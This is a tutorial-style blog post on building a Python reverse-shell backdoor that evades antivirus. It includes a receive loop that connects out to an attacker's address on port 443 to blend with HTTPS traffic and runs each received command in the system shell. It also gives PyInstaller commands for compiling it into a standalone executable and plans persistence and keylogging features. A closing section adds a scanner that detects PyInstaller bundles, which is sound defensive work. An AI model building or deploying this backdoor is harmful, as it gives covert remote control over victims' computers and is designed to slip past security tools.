Today we are going to program a simple custom backdoor — a few lines of code — that, at the time of writing, is not flagged by any of the antivirus products I tested. We’re gonna be writing this code in the Python programming language. If you don’t have the environment set up, don’t worry: I have another brief video/post showing you the requirements, click here to check it out.
The idea is to give you guys the power of creating your own backdoors instead of blatantly depending on crypters, third-party code (which isn’t always safe to use) and so on. In all honesty, I’m just as new to Python as most of you readers probably are — although if you check my about page, I do program in other languages — nevertheless I have faith that with a little effort we will be able to not only create a stealthier backdoor, but also add new features as well such as persistence, keylogging and maybe even a multi-threaded listener to control more than one client at a time.
Right now this is mainly speculation, and of course the main point is not to have a shell to do bad things with, but to learn how these protocols work inside and outside of Python — so yes, if you are interested in custom backdoors in another language, just drop a line.
Hopefully this tutorial will also become a series, so long as you guys — the readers — collaborate ideas to implement and help out as well to make a stealthier custom backdoor.
Here is the code used for the custom shell. It is an excerpt of the receive loop, so make sure to substitute the placeholder values (the `HOST` string, the port, etc.) with your own.
```python
import socket
import subprocess

HOST = 'Your IP Address'   # replace with the address of the listening host
PORT = 443                 # outbound TCP on 443 blends in with ordinary HTTPS traffic

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# ... the connect call and the start of the command loop are in the full download ...
data = s.recv(1024)                      # one command line per read
if data == "quit": break                 # the controller ends the session
# every received line is handed straight to the system shell (cmd.exe /c or /bin/sh -c)
proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
stdoutput = proc.stdout.read() + proc.stderr.read()   # captured output is sent back over s
# loop ends here
```
You can click here and download my copy of the backdoor and netcat. [ DOWNLOAD ]
I have seen this code in a few places, such as Dave K’s blog and the book “Foundations of Python Network Programming” both listed at the end of this post in the further readings section…
As mentioned in my previous post, we will be using PyInstaller to create the stand-alone executable. It comes out pretty heavy for a shell (a few megs) but hey, it works great and was completely undetected in my testing.
Here are the commands used for compiling the code; again, just replace the script name if yours differs. Oh yea, make sure you are inside the PyInstaller directory as well… and that you have your code copied to that location. (These two-step `Makespec.py`/`Build.py` commands belong to the older PyInstaller releases this post was written against.)

```shell
python Makespec.py --onefile shell.py
python Build.py shell\shell.spec
```
That’s about it, your executable should be ready to go — inside the `dist` folder.
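A caveat worth knowing when you rely on "undetected by signatures": a one-file PyInstaller build is easy to recognise structurally, because the bootloader carries an appended archive that ends with a cookie starting with the magic bytes `MEI\x0c\x0b\x0a\x0b\x0e`, and the embedded `PYZ-00.pyz` archive name is usually visible as a plain string. The scanner below is an added example (my code, not the author's or PyInstaller's) that looks for those two markers in a byte buffer; the two sample "executables" are constructed in-line rather than real builds, so the only thing this proves is that the markers are found when present. Finding them says "built with PyInstaller", which is not the same as "malicious"; plenty of legitimate tools ship this way.

```python
import os

# Magic at the start of the PyInstaller CArchive cookie (PyInstaller/archive/readers.py).
PYINSTALLER_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
# Name of the compressed module archive bundled into every PyInstaller build.
PYZ_MARKER = b"PYZ-00.pyz"


def scan_for_pyinstaller(data):
    """Return the PyInstaller indicators found in a file's bytes.

    The cookie sits at the end of the appended archive, so we search from the
    end (rfind) to get the offset of the last occurrence.
    """
    offset = data.rfind(PYINSTALLER_MAGIC)
    return {
        "cookie": offset != -1,
        "cookie_offset": offset,
        "pyz_archive": PYZ_MARKER in data,
    }


def is_pyinstaller_bundle(data):
    ind = scan_for_pyinstaller(data)
    return ind["cookie"] or ind["pyz_archive"]


def scan_directory(root):
    """Walk a directory and report which files look like PyInstaller bundles."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                if is_pyinstaller_bundle(fh.read()):
                    hits.append(path)
    return sorted(hits)


# Constructed stand-ins for a bundled and a clean executable (not real PE files).
CONSTRUCTED_BUNDLE = (
    b"MZ" + b"\x00" * 64 + b"fake bootloader" + b"\x00" * 32
    + PYZ_MARKER + b"\x00" * 16
    + PYINSTALLER_MAGIC + b"\x00" * 80          # cookie body padded to its fixed size
)
CONSTRUCTED_CLEAN = b"MZ" + b"\x00" * 64 + b"ordinary program" + b"\x00" * 128


if __name__ == "__main__":
    for label, blob in (("bundle", CONSTRUCTED_BUNDLE), ("clean", CONSTRUCTED_CLEAN)):
        print(label, scan_for_pyinstaller(blob))
```

On a real sample the cookie offset tells you where the archive trailer begins, which is the same structure PyInstaller's own extraction tooling reads, so a scanner that flags the cookie will keep working across compiler versions as long as the archive format does.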
Check out the video for commentary explaining the code line by line…